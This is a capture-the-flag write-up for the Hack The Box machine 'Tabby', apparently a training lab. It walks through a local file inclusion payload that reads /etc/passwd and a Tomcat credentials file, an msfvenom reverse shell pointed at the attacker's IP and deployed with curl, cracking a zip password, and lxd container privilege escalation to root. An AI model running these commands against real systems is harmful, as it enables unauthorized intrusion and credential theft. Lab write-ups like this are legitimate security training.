Hack The Box — Tabby WriteUp
Steps to Get the User Flag
Nmap scan.
nmap -sV -sC -Pn 10.10.10.194
Access the web page by visiting IP address on the browser
After some enumeration on the webpage i found a url which is redirecting to the http://megahosting.htb/news.php?file=statement.
So I replaced megahosting.htb with my ip and even added megahosting.htb to /etc/hosts.
After visiting that site I found that the webpage is vulnerable to Local File Inclusion.
Check the url .
So i entered a payload “ ../../../../etc/passwd” in the file parameter to view the passwd file.
Visiting the 8080 port
Visit the url 10.10.10.194:8080 and it prints the following result.
When i clicked on host manager i got a login portal. I tried some default credentials but got nothing.
So now it is clear that we have to get the password of Apache web server admin.
So I Google about Apache configuration files found about some XML files, so we even need to look at the source codes as well.
I got to know that configuration files are saved in usr/share.
Searching more i tried the URL
http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml and this returns a blank page but after looking into its source code we can have a clear look at the password and username.
Username = tomcat
Password = $3cureP4s5w0rd123!
Roles = admin-gui, manager-script
Let’s login with these credentials and enumerate the gui-panel.
From the roles given above I got to know that we can use curl command to create, delete and manage.
So i created my reverse shell using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your_IP> LPORT=4444 -f war > shell.war
Upload the reverse shell using curl command
<<< curl -u ‘tomcat’:’$3cureP4s5w0rd123!’ -T shell.war ‘http://10.10.10.194:8080/manager/text/deploy?path=/rev_shell' >>>
Now started listening on port 4444 and executed the shell using command.
Curl -u’tomcat’:’$3cureP4s5w0rd123!’http://10.10.10.194:8080/rev_shell/
Got the shell.
Changing the directory to /var/www/html.
Now I checked check for some files which may me further.
Changing the current directory to files. And here we go, there is a backup file named “16162020_backup.zip“.
Let’s download the same file using netcat and save it in our machine
Unzipping that file i got to know that it is password protected so i used frackzip and crack the password.
Password = “admin@it”
Now I used this password with username ash and used the command “su ash”.
Visited /home/ash we got our user.txt
PRIVILEGE ESCALATION
Firstly I tried sudo –l but we don’t have permissions for it.
Ran $id command to check info about users and groups.
There was a interesting group lxd .
So I Googled about Privelege escalation via lxd and got an article from hackarticles website.
https://www.hackingarticles.in/lxd-privilege-escalation/
I followed the same steps
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
$sudo bash build-alpine and started SimpleHTTPServer
Now in the home directory of ash, download our alpine tar.gz file using wget
wget http://YOUR_IP:8000/alpine-v3.12-x86_64-20201106_2337.tar.gz
lxc image import ./alpine-v3.12-x86_64–20201106_2337.tar.gz — alias simage
lxc image list
lxc init simage -c security.privileged=true
lxc config device add amazing-bullfrog mydevice disk source=/ path=/mnt/root recursive=true
lxc start amazing-bullfrog
lxc exec amazing-bullfrog /bin/sh
id
cd /mnt/root
cd root
ls
cat root.txt
Owned Tabby!!!
